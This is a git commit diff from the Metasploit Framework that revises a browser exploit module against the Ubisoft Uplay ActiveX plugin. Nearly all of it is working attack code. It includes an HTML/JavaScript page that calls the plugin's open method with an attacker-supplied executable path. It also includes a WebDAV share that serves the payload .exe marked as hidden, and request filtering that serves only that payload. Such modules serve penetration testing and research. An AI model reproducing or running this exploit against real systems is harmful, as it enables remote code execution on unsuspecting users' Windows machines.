Merge branch 'uplay' of https://github.com/Meatballs1/metasploit-framework into Meatballs1-uplay

2012-08-06 11:33:27 -05:00 · 2012-08-06 11:33:27 -05:00 · 25b2b2de68
parent 2f1022a5a3 1aacea951d
commit 25b2b2de68
1 changed files with 23 additions and 21 deletions
--- a/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb
+++ b/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb
@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
 		url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"

-		path = "#{@exploit_unc}#{@share_name}#{@basename}.exe"
+		path = "#{@exploit_unc}#{@share_name}\\#{@basename}.exe"

 		if path.length > 693
 			fail_with(Exploit::Failure::Unknown,"Remote path is too long must be < 694 characters")
@ -118,17 +118,16 @@ class Metasploit3 < Msf::Exploit::Remote

 		classid = "clsid:1c492e6a-2803-5ed7-83e1-1b1d4d41eb39"
 		type = "application/x-uplaypc" # Unused but alternative to classid
-		content = %Q|
-		<html>
-		<body>
-		<script>
-		x = document.createElement('OBJECT');
-		x.classid='#{classid}';document.body.appendChild(x);
-		x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play');
-		</script>
-		</body>
-		</html>
-		|
+		content = %Q|<html>
+<body>
+<script>
+x = document.createElement('OBJECT');
+x.classid='#{classid}';
+document.body.appendChild(x);
+x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play');
+</script>
+</body>
+</html>|

 		print_status("GET => Exploit")
 		send_response_html(cli, content)
@ -136,7 +135,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	end

 	def process_get(cli, request)
-
 		myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
 		webdav = "\\\\#{myhost}\\"

@ -379,6 +377,7 @@ class Metasploit3 < Msf::Exploit::Remote
 <D:getcontenttype>application/octet-stream</D:getcontenttype>
 </D:prop>
 <D:status>HTTP/1.1 200 OK</D:status>
+<D:ishidden b:dt="boolean">1</D:ishidden>
 </D:propstat>
 </D:response>
 |
@ -397,16 +396,19 @@ class Metasploit3 < Msf::Exploit::Remote

 	# This method rejects requests that are known to break exploitation
 	def blacklisted_path?(uri)
-		return true if uri =~ /\.(config|manifest|Local|dll)/i
-		return true if uri =~ /desktop\.ini/i
-		return true if uri =~ /lib.*\.dll/i
-		return true if uri =~ /\.tmp$/i
-		return true if uri =~ /(pcap|packet)\.dll/i
-		false
+		share_path = "/#{@share_name}"
+		payload_path = "#{share_path}/#{@basename}.exe"
+		case uri
+		when payload_path
+			return false
+		when share_path
+			return false
+		else
+			return true
+		end
 	end

 	def exploit
-
 		if datastore['EXPLOITPATH']
 			@uplay_uri = datastore['EXPLOITPATH']
 		else
@ -421,7 +423,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
 		end

-		vprint_status("Payload available at #{@exploit_unc}#{@share_name}\\#{@basename}")
+		vprint_status("Payload available at #{@exploit_unc}#{@share_name}\\#{@basename}.exe")
 		print_status("Exploit URI: http://#{myhost}:#{datastore['SRVPORT']}/#{@uplay_uri}")

 		super